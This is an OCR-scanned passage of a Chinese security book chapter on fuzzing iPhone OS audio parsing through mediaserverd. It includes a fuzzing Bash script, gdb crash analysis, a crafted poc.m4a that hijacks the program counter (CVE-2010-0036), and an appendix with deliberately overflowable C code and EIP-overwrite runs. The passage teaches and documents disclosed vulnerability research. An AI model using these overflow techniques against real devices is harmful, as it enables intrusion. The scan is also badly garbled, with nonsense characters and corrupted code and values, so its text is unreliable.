然后 我 让 浏览 帮 指 问 第 一 个 改动 过 的 测试 用 例文 件 的 URL 一 一 file0.m4a。 

图 8-2 显示 移动 版 Safari 打开 了 这 个 改动 过 的 文件 ,但 是 不 能 正确 解析 。 

到 目前 为 止 完成 了 什么 呢 ? 我 可 以 通过 改动 音频 文件 来 准备 测试 用 例 ， 局 动 
移动 版 Safari， 并 让 它 加 载 测试 用 例 。 此 时， 我 想 找到 一 个 方法 ， 在 监视 
mediaserverd 出 错时 ， 让 移动 版 Safari 目 动 一 个 接 一 个 地 打开 测试 用 例文 件 。 我 
号 了 下 面 这 个 Bash 小 脚本 在 手机 上 完成 该 工作 。 
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x 


No SIM => 19:54 E3 


Done 00:02 -feme -00:20 — ", 


( ) This movie format is not 
supported. 


http://192.168.99.103/Alarm.m4a 





图 8-1 用 移动 版 Safari 播放 未 改过 的 文件 图 8-2 ”播放 改动 过 的 测试 用 例文 件 


Alarm.m4a ( file0.m4a ) 


代码 清单 8-3 ”监视 mediaserverd 出 错时 自动 打开 测试 用 例文 件 的 代码 





( audiofuzzer.sh ) 


it! /bin/bash 
fuzzhost-192.168.99.103 


echó [4]. es 
echo [+] Start fuzzing 
echo [+] 

echo -n "[+] Cleanup: 
killall MobileSafari 
killall mediaserverd 
sleep 5 

echo 


origpid=`ps -u mobile -o pid,command | grep /usr/sbin/mediaserverd | cut -c 0-5^ 
echo [+] Original PID of /usr/sbin/mediaserverd: $origpid 


currpid=$origpid 
let cnt=0 
let i=0 


while [ $cnt -le 1000 ]; 
do 
if [ $i «eg 10]; 
then 
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echo -n "[+] Restarting mediaserverd.. " 
killall mediaserverd 
sleep 4 
origpid= ps -u mobile -o pid,command | grep /usr/sbin/ > 


mediaserverd | cut -c 0-5° 


29 currpid=$origpid 

30 Sleep 10 

31 echo "done" 

32 echo [+] New mediaserverd PID: $origpid 

33 i-0 

34 fi 

35 echo 

36 echo. [F] Sees 

37 echo [+] Current file: http://$fuzzhost/file$cnt.m4a 

38 openURL http: //$fuzzhost/file$cnt.m4a 

39 sleep 30 

40 currpid= ps -u mobile -o pid,command | grep /usr/sbin/mediaserverd | — 
cut -c 0-5 

41 echo [+] Current PID of /usr/sbin/mediaserverd: $currpid 
42 if [ $currpid -ne $origpid ]; 

43 then 

44 echo [+] POTENTIAL BUG FOUND! File: file$cnt.m4a 
45 openURL http://$fuzzhost/BUG FOUND file$cnt.m4a 
46 origpid-$currpid 

47 sleep 5 

48 fi 

49 ((cnt++) ) 

50 ((i++)) 

51 killall MobileSafari 

52 done 

53 

54 killall MobileSafari 





代码 清单 8-3 中 的 Bash 脚本 是 这 样 工作 的 。 

O28 3 行 显 示 伺 服 测试 用 例 的 Web Wk as IP 地址 。 

O 第 9 行 和 第 10 行 重启 mediaserverd， 并 日 杀 掉 所 有 在 运行 的 移动 版 Safari 
进程 实例 ， 创 造 一 个 干净 的 环境 。 

口 第 14 行 复制 音频 守护 进程 mediaserverd 的 进程 ID 给 变量 origpid. 

a 第 21 行 包含 针对 每 个 测试 用 例 都 要 执行 的 主 循环 。 

口 第 23 至 34 行 每 10 个 测试 用 例 重 局 一 次 mediaserverd。 对 iPhone 的 fuzzing 
可 能 很 枯燥 ， 因 为 包括 mediaserverd 在 内 的 一 些 组 件 很 容易 挂 起 。 

a 第 38 行 用 openURL 工具 启动 Web 服务 器 上 独立 的 测 斌 用例。 外 

a 第 40 行 复制 音频 守护 进程 mediaserverd 的 当前 进程 ID 给 变量 currpid. 

O 第 42 行 比较 保存 的 mediaserverd 进程 ID 〈 见 第 14 行 ) 和 当前 守护 进程 
ID。 处 理 一 个 测试 用 例 时 ,， 若 mediaserverd 遇 到 一 个 错误 并 重启 ， 这 两 个 
进程 ID 便 不 一 样 。 这 个 结果 记录 到 手机 终端 ( 见 第 44 行 )。 这 个 脚本 也 会 
发 送 一 个 GET 请 求 给 Web IKA ar, EL BUG FOUND 字符 串 和 导致 
mediaserverd fist CPF (ULE 45 1T )。 
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a 第 51 行 在 每 次 测试 用 例 运 行 之 后 杀 掉 当 前 移动 版 Safari 实例 。 

实现 这 个 小 脚本 之 后 ， 我 从 文件 偏 移 位 置 0 开始 ， 生 成 了 1000 个 改动 过 的 
Alarm.m4r 铃 首 文 件 ， 把 它们 复制 到 Web 服务 套 的 根 目 录 ， 然 后 在 iPhone 上 运行 
audiofuzzer.sh 脚本 。 有 时 手机 会 由 于 内 存 泄 露 而 死机 。 每 一 次 死机 ， 我 必须 重启 
FHL, M Web 服务 器 的 访问 日 志 中 提取 最 后 处 理 的 测试 用 例文 件 名 ， 调 整 代码 清 
单 8-3 的 第 18 行 , 然后 继续 模糊 测试 。 模糊 测试 iPhone 就 是 这 样 痛 吉 …… 但 这 是 
值得 的 ! 除了 内 存 泄露 导致 手机 挂 起 之 外 ， 我 还 发 现 ， 很 多 月 演 是 由 内 存 数据 损 
坏 造 成 的 。 











8.2 BB AF 


模糊 测试 程序 处 理 完 所 有 的 测试 用 例 之 后 ,我 就 在 Web Hk Ar aR Vile] Hs 
搜索 BUG FOUND 条 目 。 


linux$ grep BUG /var/log/apache2/access.log 

192.168.99.103 .. "GET /BUG FOUND file40.m4a HTTP/1.1" 404 277 "-" "Mozilla/5.0 
(iPhone; U; CPU iPhone OS 2 2 1 like Mac OS X; en-us) AppleWebKit/525.18.1 (KHTML, 
like Gecko) Version/3.1.1 Mobile/5H11 Safari/525.20" 

192.168.99.103 .. "GET /BUG FOUND file41.m4a HTTP/1.1" 404 276 "-" "Mozilla/5.0 
(iPhone; U; CPU iPhone OS 2 2 1 like Mac OS X; en-us) AppleWebKit/525.18.1 (KHTML, 
like Gecko) Version/3.1.1 Mobile/5H11 Safari/525.20" 

192.168.99.103 .. "GET /BUG FOUND file42.m4a HTTP/1.1" 404 277 "-" "Mozilla/5.0 
(iPhone; U; CPU iPhone OS 2 2 1 like Mac OS X; en- us) dU 18.1 (KHTML, 
like Gecko) Version/3.1.1 Mobile/5H11 Safari/525. 20" 

[..] 


如 节选 的 日 志文 件 所 示 ，mediaserverd 在 试 SREI — 样 
图 播放 测试 用 例文 件 40、41 和 42 时 遇 到 错误 。 ”iphone 使 用 ARM CPU. 一 点 
为 了 分 析 骨 演 原 因 , 我 重启 了 手机 , 并 且 把 GNU ”非常 重要 ， 因 为 Arm 汇编 语 
Was CU. B.4 7) 附加 到 mediaserverd。 = fo Intel 汇编 很 不 — E. 


iphone# uname -a 
Darwin localhost 9.4.1 Darwin Kernel Version 9.4.1: Mon Dec 8 20:59:30 PST 2008; 
root: xnu-1228.7.37~4/RELEASE ARM S5L8900X iPhone1,1 arm M68AP Darwin 


iphone# id 
uid=0(root) gid-O(wheel) 


iphone# gdb -q 


启动 gdb 之 后 ， 用 以 下 命令 得 到 mediaserverd 的 当前 进程 ID。 
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(gdb) shell ps -u mobile -0 pid | grep mediaserverd 
8 8 
27 ?? Ss 0:01.63 /usr/sbin/mediaserverd 


然后 在 调试 器 中 加 载 mediaserverd 二 进 制 文件 ， 并 把 调试 器 附加 到 进程 上 


(gdb) exec-file /usr/sbin/mediaserverd 


Reading symbols for shared libraries ......... done 
(gdb) attach 27 
Attaching to program: '/usr/sbin/mediaserverd', process 27. 


Reading symbols Tor shared Libraries susesadeeseecea d ek aRPE EPI ERE Caes done 
0x3146baa4 in mach msg trap () 


继续 执行 mediaserverd z Hi, 用 follow-fork-mode 命令 告诉 调试 器 跟踪 子 进 
程 ， 而 不 是 父 进 程 : 
(gdb) set follow-fork-mode child 


(gdb) continue 
Continuing. 


打开 手机 上 的 移动 版 Safari， 指 回 编 号 40 的 测试 用 例文 件 〈file40.m4a ) 的 
URL. JA P 
Program received signal EXC BAD ACCESS, Could not access memory. 
Reason: KERN PROTECTION FAILURE at address: 0x01302000 


[Switching to process 27 thread 0xa10b | 
0x314780ec in memmove () 


MRE mediaserverd 试图 访问 地 址 0x01302000 处 的 内 存 时 。 


(gdb) x/1x 0x01302000 
0x1302000: Cannot access memory at address 0x1302000 


ys Hr, mediaserverd 试图 引用 未 映射 的 内 存 位 置 时 朋 沉 。 为 了 
一 步 分 析 ， 我 打印 了 当前 的 调用 栈 。 


(gdb) backtrace 

#0 Ox314780ec in memmove () 

#1 Ox3493d5e0 in MP4AudioStream: :ParseHeader () 
#2  0x00000072 in ?? () 

Cannot access memory at address 0x72 


这 个 输出 很 有 趣 。 栈 帧 #2 的 地 址 是 一 个 不 常见 的 值 (0x00000072 )， 看 上 去 像 
是 栈 已 遭 破 坏 。 我 用 以 下 命令 打印 MP4AudioStream: :ParseHeader() 执 行 的 最 后 一 
条 指令 见 栈 帆 #1 )。 
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(gdb) x/1i 0x3493d5e0 - 4 
0x3493d5dc < ZN14MP4AudioStream11ParseHeaderER27AudioFileStreamContinuation+1652>: 
bl 0x34997374 «dyld stub memcpy» 


MP4AudioStream: :ParseHeader() 执 行 的 最 后 一 条 指令 是 调用 memcpy() ， 一 是 
是 它 导致 了 月 沉 。 此 时 此 刻 ， 这 个 bug 展示 了 栈 缕 冲 区 洲 出 漏洞 的 所 有 特征 C IL 
ALT) 

RIET RARS, HARA. PILED, AHE Ii r BA On 8] 
mediaserverd 上 ， 这 一 次 我 在 MP4Audiostream: :ParseHeader() 调 用 memcpy() 的 地 
方 也 定义 了 一 个 断 点 ， 以 评估 传 给 memcpy() 的 参数 。 


(gdb) break *0x3493d5dc 
Breakpoint 1 at 0x3493d5dc 


(gdb) continue 
Continuing. 


我 在 移动 版 Safari 中 打开 编号 为 40 的 测试 用 例 ( file40.m4a ), 触发 这 个 断 点 。 
[Switching to process 27 thread Ox9cob| 


Breakpoint 1, 0x3493d5dc in MP4AudioStream: :ParseHeader () 


memcpy() 的 参数 通常 保 存在 xo Ay FF ( 目标 缓冲 区 ) ri ap Fea ( 源 绥 冲 区 ) 
以 及 x2 iffa (复制 的 字 市 数 ) 中 。 从 调试 大 中 得 到 这 些 寄存 融 的 当前 值 。 


(gdb) info registers rO r1 r2 








ro 0x684a38 6834744 
r1 0x115030 1134640 
r2 OxifdO 8144 





RERA Say Pat T1 指 问 的 数据 ， 看 memcpy() 的 源 数据 是 不 是 用 户 可 控 的 。 


(gdb) x/40x $r1 


0x115030: 0x00000000 0xd7e178c2 0xe5e178c2 Ox80bb0000 
0x115040: 0x00b41000 0x00000100 0x00000001 0x00000000 
0x115050: 0x00000000 0x00000100 0x00000000 0x00000000 
0x115060: 0x00000000 0x00000100 0x00000000 0x00000000 
0x115070: 0x00000000 0x00000040 0x00000000 0x00000000 
0x115080: 0x00000000 0x00000000 0x00000000 0x00000000 
0x115090: 0x02000000 0x2d130000 0x6b617274 0x5c000000 
0x1150a0: 0x64686b74 0x07000000 0xd7e178c2 0xe5e178c2 
0x1150b0: 0x01000000 0x00000000 0x00b41000 0x00000000 
0x1150c0: 0x00000000 0x00000000 0x00000001 0x00000100 


然后 在 编写 为 40 的 测试 用 例文 件 中 搜索 这 些 值 。 在 文件 的 开头 找到 了 它们 ， 


格式 为 小 端 表示 法 。 
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[..] 

00000030h: 00 00 00 00 C2 78 E1 D7 C2 78 E1 E5 00 00 BB 80 ; ....AxaxAxda. .»€ 
00000040h: 00 10 B4 00 00 01 00 00 01 00 00 00 00 00 00 00 ; ..*... cece eee 
00000050h: 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 ; ................ 
00000060h: 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 ; ................ 
00000070h: 00 00 00 00 40 00 00 00 00 00 00 00 00 00 OO OO ; ....0........... 


因此 我 可 以 控制 内 存 复制 的 源 数据 。 继 续 执 行 mediaserverd， 在 调试 硕 中 得 
到 以 下 输出 。 


(gdb) continue 
Continuing. 


Program received signal EXC BAD ACCESS, Could not access memory. 


Reason: KERN PROTECTION FAILURE at address: 0x00685000 
0x314780ec in memmove () 


mediaserverd 在 试图 访问 未 映射 内 存 时 再 次 天 省 。 看 上 去 似乎 是 传 给 memcpy() 
的 字 市 数 参 数 太 大 了 ， 因 此 这 个 子 数 试图 复制 的 音频 文件 数据 超出 了 栈 帧 底 。 这 
时 我 俘 下 调试 锅 ， 用 十 六 进 制 编辑 郑 打 开导 致 月 溃 的 那个 测试 用 例文 件 
(file40.m4a )。 





00000000h: 00 00 00 20 66 74 79 70 4D 34 41 20 00 00 00 00 ; ... ftypM4A .... 
00000010h: 4D 34 41 20 6D 70 34 32 69 73 6F 6D 00 00 00 00 ; M4A mp42isom.... 
00000020h: 00 00 1C 65 6D 6F 6F 76 FF 00 OO 6C 6D 76 68 64 ; ...emoovy..lmvhd 


在 文件 偏 移 40 (0x28 ) Ab np LARS ETSI FP SA TATRA Coxff)s 我 
A J F “QuickTime 文件 格式 规范 ( QuiteTime File Format Specification ) |”, fff 
XE T OCTEZRTATPAA P 6 VE. FRR tak, FDXSI— PF movie header atom, 
该 字 节 是 其 大 小 的 一 部 分 ， 所 以 模糊 测试 程序 一 定 是 改变 了 这 个 atom 的 大 小 值 。 
就 像 我 之 前 说 的 ， 传 给 memcpy() 的 值 太 大 ，mediaserverd 在 试图 复制 这 么 多 数据 
SE EA AT Y s 为 了 避免 这 个 朋 沉 ,我 把 atom 的 大 小 设 为 一 个 较 小 的 值 ,并 把 
文件 偏 移 40 处 那个 改动 过 的 值 改 回 oxoo, (dme 42 处 的 值 改 回 0x02。 

下 面 是 原来 的 编号 40 测试 用 例文 件 ( file40.m4a )。 








00000020h: 00 00 1C 65 6D 6F 6F 76 FF 00 00 6C 6D 76 68 64 ; ...emoovj..lmvhd 
而 以 下 是 新 的 测试 用 例文 件 Cfiledo 2.m4a )， 下 划 线 标识 改动 的 值 。 


00000020h: 00 00 1C 65 6D 6F 6F 76 00 00 02 6C 6D 76 68 64 ; ...emoovy..lmvhd 
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重 局 设备 ,新 设置 生效 ,再 次 把 调试 名 附加 到 mediaserverd 上 ,从 移动 版 Safari 
中 打开 这 个 新 文件 。 


Program received signal EXC BAD ACCESS, Could not access memory. 
Reason: KERN PROTECTION FAILURE at address: 0x00000072 
[Switching to process 27 thread 0xa10b | 

0x00000072 in ?? () 


jx — Ui XU (OTET) 被 算 改 为 指 癌 地 址 0x00000072. df F Wii 
会 话 ， 开 启 一 个 新 的 会 话 ， 再 次 在 Mp4AudioStream: : ParseHeader ()75] H] memcpy() 
的 地 方 设置 一 个 断 点 。 


(gdb) break *0x3493d5dc 
Breakpoint 1 at 0x3493d5dc 


(gdb) continue 
Continuing. 


在 移动 版 Safari 中 打开 改动 后 的 测试 用 例文 件 filedO. 2.m4a WY, Jaigi th LA. 
下 内 容 。 


[Switching to process 71 thread Ox9f07;| 


Breakpoint 1, 0x3493d5dc in MP4AudioStream: :ParseHeader () 


打印 当前 的 凋 用 栈 。 


(gdb) backtrace 

#0 0x3493d5dc in MP4AudioStream::ParseHeader () 

#1 0x3490d748 in AudioFileStreamWrapper::ParseBytes () 

#2  0x3490cfa8 in AudioFileStreamParseBytes () 

#3 0x345dad70 in PushBytesThroughParser () 

#4 Ox345dbd3c in FigAudioFileStreamFormatReaderCreateFromStream () 
#5  Ox345dffO8 in instantiateFormatReader () 

#6 0x345e02c4 in FigFormatReaderCreateForStream () 

#7 0x345d293c in itemfig assureBasicsReadyForInspectionInternal () 
#8 0x345d945c in itemfig makeReadyForInspectionThread () 

#9 0x3146178c in pthread body () 

#10 0x00000000 in ?? () 


列表 中 第 一 个 栈 帧 就 是 我 要 找 的 。 我 用 如 下 命令 显示 MpAAudioStream:: 
ParseHeader() 的 当前 栈 帧 信息 。 


(gdb) info frame 0 
Stack frame at 0x1301c00: 
Ain 


mr — NvIAAQGdEdr in MDa 
PO = UVAS425050€ ifi rir4Au 


pc 0x3490d748 
called by frame at 0x1301c30 


in 
LU 


82 ”崩溃 分 析 及 利用 | 141 


Arglist at Ox1301bf8, args: 

Locals at 0x1301bf8, Saved registers: 

r4 at Ox1301bec, r5 at Ox1301bfO, r6 at Ox1301bf4, r7 at Ox1301bf8, r8 at > 
0x1301be0, sl at 0x1301be4, fp at 0x1301be8, lr at 0x1301bfc, pc at 0x1301bfc, 

s16 at 0x1301ba0, s17 at 0x1301ba4, s18 at 0x1301ba8, s19 at Ox1301bac, s20 at 9 
0x1301bb0, s21 at 0x1301bb4, s22 at 0x1301bb8, s23 at 0x1301bbc, 

$24 at 0x1301bc0, s25 at 0x1301bc4, s26 at 0x1301bc8, s27 at Ox1301bcc, s28 at — 
0x1301bd0, s29 at 0x1301bd4, s30 at 0x1301bd8, s31 at 0x1301bdc 


BA ERI fe EREE I tit (pc ar Feat) EERE RES Wet 
输出 所 示 ，pc 保存 在 栈 上 地 址 为 ox13o1bfc 的 地 方 ( Ul, Saved registers). 
然后 继续 执行 该 进程 。 








(gdb) continue 
Continuing. 


Program received signal EXC BAD ACCESS, Could not access memory. 


Reason: KERN PROTECTION FAILURE at address: 0x00000072 
0x00000072 in ?? () 


崩溃 后 ， 我 查看 MP4AudioStream: :ParseHeader() 之 前 保存 程序 计数 器 的 栈 位 
置 〈 内 存 地 址 0x1301bfc )， 肯 数 期 望 从 这 里 找 回 程序 计数 需 。 


(gdb) x/12x 0x1301bfc 


0x1301bfc: 0x00000073 0x00000000 0x04000001 0x0400002d 
0x1301cO0c: 0x00000000 0x73747328 0x00000063 0x00000000 
0x1301c1c: 0x00000002 0x00000001 0x00000017 0x00000001 





调试 着 的 输出 显示 保存 的 指令 指针 被 数值 0x00000073 R50 PRAGA TE CIR 
回 给 自己 的 调用 函数 时 ， 这 个 改动 过 的 值 赋 给 了 指令 指针 ( pc 寄存 器 )。 有 具体 来 
说 就 是 ， 由 于 ARM CPU 的 指令 对 齐 ( 指令 按 16 位 或 32 位 边界 对 齐 ) 机 制 ， 复 
制 到 指令 指针 的 是 ox00000072， 而 不 是 文件 中 的 0x00000073。 

这 个 极其 简单 的 模糊 测试 程序 确实 从 iPhone 的 音频 库 中 发 现 了 一 处 典型 的 栈 
缓冲 区 游 出 。 我 在 测试 用 例文 件 里 搜索 调试 锅 输 出 的 字 节 模式 ， 在 文件 
file40 2.m4a 偏 移 量 为 500 的 地 方 找到 了 这 个 字 节 序列 。 


000001foh: 18 73 74 74 73 00 00 OO OO OO OO OO 01 00 00 04 ; .stts........... 
00000200h: 2D 00 00 04 00 00 00 00 28 73 74 73 63 00 00 OO ; -....... (stsc... 
00000210h: 00 00 00 00 02 00 00 00 01 00 OO OO 17 00 OO OO ; ................ 


然后 我 把 上 面 下 划 线 处 的 值 改 为 0x44444444， 新 文件 命名 为 poc.m4a。 


000001fOh: 18 73 74 74 44 44 44 44 00 00 00 00 01 00 00 04 ; .sttDDDD......... 
00000200h: 2D 00 00 04 00 00 00 00 28 73 74 73 63 00 00 OO ; -....... (stsc... 
00000210h: 00 00 00 00 02 00 00 00 01 00 00 00 17 00 00 00 5. ................ 
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FRE E MINE] mediaserverd 上 ,在 移动 版 afari 中 打开 新 文件 poc.m4a， 
调试 各 输出 如 下 。 
Program received signal EXC BAD ACCESS, Could not access memory. —— a StS 
Reason: KERN INVALID ADDRESS at address: 0x44444444 


[Switching to process 77 thread 0xa20f] 
0x44444444 in ?? () 


(gdb) info registers 


ro 0x6474613f 1685348671 
r1 0x393fc284 960479876 
r2 Oxcbo 3248 

r3 Ox10b 267 

r4 0x6901102 110104834 
r5 0x1808080 25198720 
r6 0x2 2 

r7 0x74747318 1953788696 
r8 Oxf40100 15991040 
r9 0x817a00 8485376 

sl Oxf40100 15991040 
fp 0x80808005 -2139062267 
ip 0x20044 131140 

Sp 0x684c00 6835200 

lr Ox1f310 127760 

pc 0x44444444 1145324612 
cpsr (0x60000010, n = 0x0, z = Ox1, C = 0x1, v = 0x0, q = 0x0, j = 0x0, ge 


= 0x0, e = 0x0, a = 0X0, i = 0x0, f = 0x0, t = OxO, mode 
=0 la ly = 0, d= 0, ] 90,890,850, 
mode = usr} 


0x10} {0x60000010, n 
0,i=0, f=0,t=0, 


(gdb) backtrace 
#0 0x44444444 in ?? () 
Cannot access memory at address 0x74747318 


耶 ! 这 时 ， 我 完全 控制 了 程序 计数 天 


8.3 漏洞 修正 


20010 年 2 月 2 日， 里 期 四 


2009 年 10 月 4 日 我 把 这 个 bug 提交 给 苹果 公司 。 今 天 他 们 发 布 了 新 版 本 的 
iPhone 0S， 修 正 了 这 一 漏洞 。 
这 个 bug 很 容易 发 现 , 因此 我 确信 我 不 是 唯 。 。 gauge 
一 知道 它 的 人 ， 但 似乎 只 有 我 通知 了 苹果 公司 。 iPhone OS 3.1.3 之 前 版 本 的 
苹果 公司 自己 没有 发 现 这 个 如 此 微不足道 的 ” iPhone fo iPod touch. 


bug. 
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8.4 经 验 和 教训 
作为 一 名 捉 虫 人 和 一 名 iPhone HF: 
O 即使 是 笨 撑 的 基于 算 改 的 模糊 测试 程序 ， 就 像 本 音 描 述 的 这 个 ， 也 是 很 有 
效 的 ; 
O 模糊 测试 iPhone 单调 乏味 ， 但 值得 ; 
a 不 要 在 你 的 iPhone 上 打开 “不 可 信 ” 的 (媒体 ) 文件 。 


8.5 补充 


20010 年 2 月 2 日 ， 里 期 四 





漏洞 已 经 修复 ， 新 版 的 iPhone OS 已 可 以 获得 ， 所 以 我 在 自己 的 网 站 上 发 布 
了 一 份 详细 的 安全 报告 站。 这 个 bug 的 编号 是 CVE-2010-0036。 图 8-3 显示 了 该 漏 
洞 处 理 的 时 间 表 。 


X € a «jid do 


&etuveiki 
草 果 公司 得 知 总 洞 存在 pe J 
-一 
10.04.2004 10.15.2009 O2.02.2010 








图 8-3.— WARDS AR ZS edo — Dh BG Jf EE ER FY EP TR] 2 


附注 

[1] Jt http://en.wikipedia.org/wiki/IOS jailbreaking ( 短 址 为 http://bit.ly/wgPs6f )。 

[2] M http://cydia.saurik.com/( 短 址 为 http://bit.ly/A7ppwQ )。 

[3] Jd “iOS Developer Library: Core Audio Overview" , 网 址 : http://developer.apple.com/library/ios/ 
Zdocumentation/MusicAudio/Conceptual/CoreAudioOverview/Introduction/Introduction.html 
( 短 址 为 http://bit.ly/w7 ADUS )。 

[4] J “iOS Developer Library: Audio Toolbox Framework Reference”, PAL: http://developer. 
apple.com/library/ios/#documentation/MusicAudio/Reference/CA AudioTooboxRef/ index.html 
( 短 址 为 http://bit.ly/wpmcb9 )。 

[5] JL http://en.wikipedia.org/wiki/Advanced Audio Coding( 短 址 为 http://bit.ly/wQUPPR )。 
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[6] JL http://ericasadun.com/ftp/EricaUtilities/ ( 短 址 为 http://bit.ly/xe8ioz ). 

[7] QuickTime 文件 格式 规范 可 从 以 下 网 址 得 到 : http://developer.apple.com/mac/library/docum- 
entation/QuickTime/QTFF/QTFFPreface/gtffPreface.html ( 短 址 为 http://bit.ly/xNdk8k )。 

[S] 我 详细 摘 述 这 个 iPhone 漏洞 的 安全 报告 可 从 以 下 网 址 得 到 : http:/www.trapkit.de/advisories/ 
TKADV2010-002.txt ( 短 址 为 http://bit.ly/xLFFRn )。 





fe E te 78 








相 比 正文 ， 附录 A CATR A dee — edil PSS Das Tel A] Ae AN AEE n] 
能 导致 bug 的 普遍 问题 。 


A.1 栈 缓 冲 区 汶 出 


缓冲 区 溢出 是 内 存 损坏 漏洞 ， 可 以 按 类 型 (或 者 说 产生 原因 ，generation ) 分 
类 ， 目 前 最 重要 的 是 栈 缓冲 区 溢出 和 挫 缓冲 区 溢出 。 如 果 复 制 到 一 个 缓冲 区 或 数 
组 的 数据 长 度 超出 了 它们 所 能 容纳 的 ， 就 会 发 生 溢出 。 就 是 这 么 简单 。 顾 名 思 义 ， 
栈 缓冲 区 溢出 发 生 在 进程 内 存 的 栈 区 。 栈 是 进程 的 一 块 特殊 内 存 ， 用 来 存放 与 卫 
数 调 用 相关 的 数据 和 元 数据 。 如 果 太 多 的 数据 写 
到 栈 上 声明 的 缓冲 区 中 ， 超 出 缓冲 区 所 能 容纳 的 AFR FE t Don th 
数量 ， 邻 近 的 栈 内 存 就 会 被 覆 写 。 用 户 如 果 能 控 。 O96 SERE 32 位 Intel 
制 数据 和 数据 的 量 ， 就 可 能 臭 改 这 些 本 数据 ,从 “23> 
而 得 以 控制 进程 的 执行 流 。 

进程 执行 的 每 一 个 函数 都 表示 在 栈 上 ， 组 织 相关 信息 的 栈 空间 叫做 栈 帧 。 栈 
帧 包含 相应 函数 实例 的 数据 和 元 数据 ， 以 及 调用 函数 的 返回 地 址 ， 用 来 找到 函数 
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的 调用 者 。 当 一 个 函数 返回 它 的 调用 者 时 ， 返 回 地 址 出 栈 并 写 和 人 指令 指针 (程序 
计数 ) 寄存 硕 。 如 朱 你 能 使 一 个 栈 组 种 区 溢出 ， 并 用 指定 值 覆 兰 返 回 地 址 ， 那 么 
在 胃 效 返回 时 你 就 能 控制 指令 指针 。 

还 有 很 多 其 他 方法 可 以 利用 栈 缓冲 区 洲 出 ， 例 如 操控 函数 指针 、 函 数 参 数 ， 
或 者 栈 上 其 他 重要 数据 和 元 数据 。 

我 们 看 一 个 程序 实例 。 





代码 清单 A-1 程序 实例 stackoverflow.c 


01 #include «string.h» 
02 

03 void 

04 overflow (char *arg) 
06 char buf[12]; 


08 strcpy (buf, arg); 
i 
11 int 
14 if (argc > 1) 
15 overflow (argv[1]); 


17 return 0; 


代码 清单 A-1 BAUER KAA — Mb fr ER e HD iat Hao BITS TB 
(第 15 47 ) TEHMERRAZA overflow() 的 参数 。 在 overflow() P, 用 户 输入 的 数据 被 复 
制 到 一 个 12 STR AREAS 6 行 和 第 8 行 )， 如 果 我 们 输入 的 数据 长 度 
超出 了 这 个 缓冲 区 所 能 容纳 的 数量 ( 12 5E )， 栈 绥 冲 区 就 会 溢出 ， 相 邻 的 栈 数 
hs zs RC AN COR. ui o 

图 A-1422 f TEES PDC Ha BET Ae Tace] RC 癌 低 地 址 空间 ) 增 
长 的 ， 返回 地 址 ( RET ) 后 紧 跟 着 的 是 男 一 块 元 数据 ， 称 为 保存 的 帧 指针 (SFP, 
Saved Frame Pointer ) HifE PE PKA overflow() 中 声明 的 绥 冲 区 。 和 栈 的 癌 下 增 
长 不 一 样 ， 栈 绥 冲 区 里 的 数据 填充 是 癌 高 地 址 增长 的 。 如 果 给 第 一 个 命令 行 参数 
Pett ie a WBE, EMM BES mAP, SFP. RET 和 相 邻 的 栈 内 存 。 
PRG IES, FRM RHE RH RET 的 值 ， 进 而 控制 指令 指针 (EIP AITAN )。 
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EIP 控制 


A P Hp ty ab taj SE 


— 
SFP ] 
其 他 元 数据 
overflow() eb RE db buf 


TUNE 


图 A-1 P Dek HH B ToU Je 





A.1.1 示例 : Linux 下 的 栈 缓冲 区 溢出 


为 了 在 Linux ( Ubuntu 9.04 ) 下 测试 代码 清单 A-1 的 程序 ， 编 译 时 我 禁用 了 堆 
栈 保 护 〈canary 探测 )( 见 C.1 市 )。 


linux$ gcc -fno-stack-protector -0 stackoverflow stackoverflow.c 





然后 ， 在 调试 带 中 运行 这 个 程序 (关于 gdb 的 更 多 信息 见 B.4 方 )， 提供 20 
字 广 的 输入 作为 命令 行 参数 (12 子 届 填充 栈 缓冲 区 , 4 F PAm SFP, A Ras 
RET )。 








linux$ gdb -q ./stackoverflow 
(gdb) run $(perl -e 'print "A"x12 . "B"x4 . "C"x4') 
Starting program: /home/tk/BHD/stackoverflow $(perl -e ‘print "A"x12 . "B"x4 . 


"C"x4' ) 


Program received signal SIGSEGV, Segmentation fault. 
0x43434343 in ?? () 


(gdb) info registers 


eax Oxbfab9fac -1079271508 
ecx Oxbfab9fab - 1079271509 
edx 0x15 21 

ebx 0xb8088ff4 -1207398412 
esp Oxbfab9fco Oxbfab9fco 
ebp 0x42424242 0x42424242 
esi 0x8048430 134513712 
edi 0x8048310 134513424 
eip 0x43434343 0x43434343 


eflags 0x10246 [| PF ZF IF RF | 
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CS 0x73 115 
SS Ox7b 123 
ds Ox7b 123 
es 0x7b 123 
fs 0x0 0 
gs 0x33 51 


我 得 到 了 对 指令 指针 的 控制 ( 见 EIP ay fede), PAE ISLE AES Ay a 
令 行 输入 的 4 个 字符 C (4 个 C 的 值 用 十 六 进 制 表示 是 0x43434343 )。 





A.1.2 示例 : Windows fh B4 ZZ irh [X tt 


在 Windows Vista SP2 下 关 掉 /Gs 编译 选项 ( 安全 cookie )， 编 译 代 码 清 单 A-1 
的 程序 (IL C.1 市 )。 


C:\Users\tk\BHD>cl /nologo /GS- stackoverflow.c 
stackoverflow.c 


然后 在 调试 器 里 运行 这 个 程序 (SEF WinDbg 的 更 多 信息 见 B.2 15 ), FEARS 
行 输入 与 之 前 Linux 下 调试 时 一 样 的 数据 。 

如 图 A-2 所 示 ， 结 采 和 Linux 下 的 一 样 ， 我 取得 了 对 指令 指针 的 控制 ( 见 EIP 
Af an )。 


BÍ C User: WABHD stacxoverfloy, exe AAAAAAAAAARA 
File Edit View Debug: Window Hep 


| [e] IE ET Í PPI | Ui latan [T ^g E NET B HH esl 








— - 
——— —Ó—M a 


jMicrcsoft (R) Windows Debugger Version 6,10,0003,233 X86 
Copyright (c) Microsoft Corporation. All rights reserved. 


CommandLine: C: *Users*tk*BHD*sstackoverflow.exe AAAAAAAAAAAABBBBCCCC 
Symbol search path is; *** Invalid *** 
3€ 3€ HHH HH HH HH HH EHH HHH HH HH HHH HH HFK HHH HHH HHH 3€ JE JE J€ JE HE JE 3€ JE JE JE JE JE E E E JE JE JE JE JE J: HH E E 3€ 3€ 3€ JE 9€ 9€ € € € €. 
* Symbol loading may be unreliable without a symbol search path 3* 
* Use .symfix to have the debugger choose a symbol path. * 
* After setting your symbol path, use reload to refresh symbol locations, * 
